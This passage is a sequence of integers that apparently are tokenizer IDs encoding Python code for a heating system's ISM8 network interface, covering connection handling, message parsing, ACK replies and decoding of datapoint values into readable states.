220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
58,
26059,
62,
312,
7131,
3792,
76,
23,
13,
6322,
62,
25216,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
6045,
201,
198,
201,
198,
220,
220,
220,
2488,
12708,
24396,
201,
198,
220,
220,
220,
825,
651,
62,
20850,
7,
26059,
62,
312,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5860,
12694,
1988,
422,
2839,
7177,
286,
12694,
12,
961,
654,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
288,
79,
62,
312,
287,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
13,
13083,
33529,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
58,
26059,
62,
312,
7131,
3792,
76,
23,
13,
6322,
62,
4944,
2043,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
6045,
201,
198,
201,
198,
220,
220,
220,
2488,
12708,
24396,
201,
198,
220,
220,
220,
825,
651,
62,
439,
62,
82,
641,
669,
33529,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5860,
17562,
477,
1744,
3815,
286,
3180,
44,
23,
4818,
499,
1563,
82,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
201,
198,
201,
198,
220,
220,
220,
825,
8860,
7,
944,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5860,
4941,
284,
2346,
329,
1262,
287,
8435,
62,
69,
9548,
351,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15388,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
201,
198,
201,
198,
220,
220,
220,
825,
4637,
62,
9727,
7,
944,
11,
4839,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
318,
1444,
355,
2582,
355,
281,
3180,
44,
23,
20417,
284,
4382,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4808,
431,
13292,
796,
4839,
13,
1136,
62,
26086,
62,
10951,
10786,
431,
13292,
11537,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
10951,
7203,
32048,
422,
3180,
44,
23,
25,
4064,
82,
1600,
4808,
431,
13292,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
7645,
634,
796,
4839,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
15236,
796,
6407,
201,
198,
201,
198,
220,
220,
220,
825,
1366,
62,
47844,
7,
944,
11,
1366,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
318,
1444,
8797,
1366,
318,
3492,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4808,
25677,
62,
20692,
796,
657,
201,
198,
220,
220,
220,
220,
220,
220,
220,
31456,
62,
13664,
796,
657,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
10786,
27369,
1366,
2722,
25,
4064,
82,
3256,
1366,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
981,
4808,
25677,
62,
20692,
1279,
18896,
7,
7890,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25677,
62,
20692,
796,
1366,
13,
19796,
7,
3792,
76,
23,
13,
31125,
62,
37682,
1137,
11,
4808,
25677,
62,
20692,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
4808,
25677,
62,
20692,
18189,
657,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
18896,
7,
7890,
29795,
25677,
62,
20692,
25,
12962,
18189,
860,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
18197,
1429,
540,
1366,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
289,
7109,
5556,
642,
9881,
14804,
265,
1551,
860,
9881,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
31456,
62,
13664,
796,
17759,
1635,
1366,
29795,
25677,
62,
20692,
1343,
604,
60,
1343,
1366,
58,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25677,
62,
20692,
1343,
642,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
31456,
62,
13664,
2058,
287,
9881,
604,
290,
642,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
31456,
62,
13664,
796,
18896,
7,
7890,
8,
1343,
352,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
362,
1744,
10906,
994,
25,
47017,
318,
284,
1790,
329,
3275,
14804,
397,
419,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
11876,
318,
4025,
5218,
621,
31456,
25,
1429,
352,
3275,
11,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
788,
2555,
9052,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
18896,
7,
7890,
8,
1279,
4808,
25677,
62,
20692,
1343,
31456,
62,
13664,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
7,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
28632,
12238,
621,
2938,
1220,
5445,
16000,
19570,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
7203,
15642,
13493,
25,
4064,
82,
33172,
1366,
29795,
25677,
62,
20692,
25,
12962,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
4634,
350,
2213,
284,
886,
286,
1366,
481,
886,
9052,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25677,
62,
20692,
796,
18896,
7,
7890,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
3758,
7125,
42,
284,
3180,
44,
23,
1864,
284,
7824,
25,
3180,
44,
48900,
11,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
788,
31456,
12,
13664,
7,
1558,
828,
788,
7125,
42,
266,
14,
362,
9881,
422,
2656,
31456,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
694,
62,
19662,
796,
416,
83,
451,
2433,
7,
3792,
76,
23,
13,
31125,
62,
37682,
1137,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
694,
62,
19662,
13,
33295,
7,
15,
87,
405,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
694,
62,
19662,
13,
33295,
7,
15,
87,
1157,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
694,
62,
19662,
13,
2302,
437,
7,
3792,
76,
23,
13,
31125,
62,
10943,
45,
62,
37682,
1137,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
694,
62,
19662,
13,
2302,
437,
7,
3792,
76,
23,
13,
31125,
62,
8120,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
694,
62,
19662,
58,
1065,
60,
796,
1366,
29795,
25677,
62,
20692,
1343,
1105,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
257,
694,
62,
19662,
58,
1485,
60,
796,
1366,
29795,
25677,
62,
20692,
1343,
1511,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
10786,
50,
1571,
7125,
42,
25,
4064,
82,
46083,
257,
694,
62,
19662,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
7645,
634,
13,
13564,
7,
441,
62,
19662,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
14681,
62,
19662,
7,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
29795,
25677,
62,
20692,
1343,
838,
25,
62,
25677,
62,
20692,
1343,
31456,
62,
13664,
12962,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
1429,
3275,
1231,
13639,
357,
11085,
838,
9881,
8,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25677,
62,
20692,
15853,
31456,
62,
13664,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
8335,
284,
651,
1306,
3275,
26,
5963,
350,
2213,
284,
1306,
6997,
70,
201,
198,
201,
198,
220,
220,
220,
825,
1429,
62,
19662,
7,
944,
11,
31456,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
10854,
274,
2722,
4818,
6713,
7,
82,
8,
1864,
284,
3180,
44,
23,
7824,
20855,
201,
198,
220,
220,
220,
220,
220,
220,
220,
656,
3275,
4129,
11,
3141,
11,
3815,
6793,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
26059,
796,
31456,
58,
19,
60,
1635,
17759,
1343,
31456,
58,
20,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1271,
286,
360,
1404,
2969,
46,
1268,
4694,
389,
30817,
656,
9881,
604,
290,
642,
286,
3275,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1312,
796,
657,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
18022,
3753,
201,
198,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
77,
1671,
796,
352,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
4818,
499,
1563,
3753,
201,
198,
220,
220,
220,
220,
220,
220,
220,
981,
288,
79,
62,
77,
1671,
19841,
3509,
62,
26059,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
10786,
6322,
1391,
15,
25,
67,
92,
1220,
1391,
16,
25,
67,
92,
287,
4818,
6713,
25,
4458,
18982,
7,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
77,
1671,
11,
3509,
62,
26059,
4008,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
312,
796,
31456,
58,
72,
1343,
718,
60,
1635,
17759,
1343,
31456,
58,
72,
1343,
767,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
288,
79,
62,
21812,
796,
31456,
58,
72,
1343,
807,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
284,
307,
9177,
329,
3597,
3815,
284,
3180,
44,
23,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
13664,
796,
31456,
58,
72,
1343,
860,
60,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
1831,
62,
8367,
796,
416,
83,
451,
2433,
7,
19662,
58,
72,
1343,
838,
25,
72,
1343,
838,
1343,
288,
79,
62,
13664,
12962,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
24442,
10786,
18709,
278,
27704,
12,
2389,
4064,
82,
11,
4064,
82,
9881,
25,
3275,
25,
4064,
82,
3256,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
312,
11,
288,
79,
62,
13664,
11,
288,
79,
62,
1831,
62,
8367,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
12501,
1098,
62,
19608,
499,
1563,
7,
26059,
62,
312,
11,
288,
79,
62,
13664,
11,
288,
79,
62,
1831,
62,
8367,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
783,
5963,
18022,
3753,
290,
4818,
499,
1563,
3753,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
77,
1671,
15853,
352,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1312,
796,
1312,
1343,
838,
1343,
288,
79,
62,
13664,
201,
198,
201,
198,
220,
220,
220,
825,
36899,
62,
19608,
499,
1563,
7,
944,
11,
288,
79,
62,
312,
11,
4129,
11,
8246,
62,
33661,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
875,
4147,
257,
2060,
1988,
1864,
284,
7824,
26,
201,
198,
220,
220,
220,
220,
220,
220,
220,
11583,
8246,
9881,
422,
3127,
290,
201,
198,
220,
220,
220,
220,
220,
220,
220,
875,
4147,
606,
1864,
284,
7824,
1366,
2099,
201,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1255,
796,
657,
201,
198,
220,
220,
220,
220,
220,
220,
220,
329,
2060,
62,
26327,
287,
8246,
62,
33661,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1255,
796,
1255,
1635,
17759,
1343,
493,
7,
29762,
62,
26327,
8,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
288,
79,
62,
312,
407,
287,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
25294,
30373,
13,
18224,
7203,
34680,
4818,
499,
1563,
25,
4064,
82,
11,
1366,
25,
4,
82,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
312,
11,
1255,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
288,
79,
62,
4906,
796,
1148,
76,
23,
13,
35,
1404,
2969,
46,
1268,
4694,
58,
26059,
62,
312,
7131,
3792,
76,
23,
13,
6322,
62,
25216,
60,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
611,
357,
13664,
6624,
352,
8,
290,
288,
79,
62,
4906,
287,
5855,
6322,
51,
62,
38978,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
33,
970,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
36695,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
11505,
26125,
1,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
1011,
352,
301,
1643,
290,
3350,
284,
347,
970,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
20512,
7,
20274,
1222,
352,
8,
30072,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
357,
13664,
6624,
352,
8,
290,
357,
26059,
62,
4906,
6624,
366,
6322,
51,
62,
39,
53,
2246,
19076,
1,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
15772,
3815,
284,
1598,
3722,
12,
5239,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1255,
6624,
657,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
27722,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
352,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
5377,
3319,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
362,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
15480,
1525,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
513,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
28489,
88,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
604,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
25954,
9985,
6,
30072,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
357,
13664,
6624,
352,
8,
290,
357,
26059,
62,
4906,
6624,
366,
6322,
51,
62,
3351,
4272,
1,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
1011,
18022,
1988,
290,
29162,
416,
1802,
14,
13381,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
1802,
1220,
14280,
1635,
1255,
30072,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
357,
13664,
6624,
352,
8,
290,
357,
26059,
62,
4906,
6624,
366,
6322,
51,
62,
41473,
54,
19076,
1,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1255,
6624,
657,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
27722,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
352,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
11484,
952,
41426,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
362,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
26447,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
513,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
7738,
19513,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
604,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
9362,
6,
30072,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
357,
13664,
6624,
352,
8,
290,
357,
26059,
62,
4906,
6624,
366,
6322,
51,
62,
39,
53,
2246,
4264,
81,
19076,
1,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
15772,
3815,
284,
1598,
3722,
12,
5239,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1255,
6624,
657,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
27722,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
352,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
39596,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
362,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
42997,
25692,
929,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
513,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
34530,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
604,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
24732,
9330,
469,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
642,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
6719,
24494,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
718,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
9362,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
767,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
14402,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
807,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
48979,
12308,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
860,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
22480,
5514,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
838,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
11146,
15226,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1367,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
23709,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1105,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
40541,
679,
803,
10363,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1511,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
48307,
12308,
14,
34530,
10363,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1478,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
5005,
17047,
312,
2649,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1315,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
9771,
571,
1358,
10363,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1467,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
48979,
15226,
10363,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1596,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
48979,
9094,
10363,
6,
30072,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1255,
6624,
1160,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
26059,
62,
27160,
13,
19119,
15090,
26059,
62,
312,
25,
705,
2949,
11522,
6,
30072,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
357,
13664,
6624,
362,
8,
290,
357,
26059,
62,
4906,
287,
5855,
6322,
51,
62,
11395,
62,
30782,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6322,
51,
62,
11395,
62,
12966,
30094,
1600,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
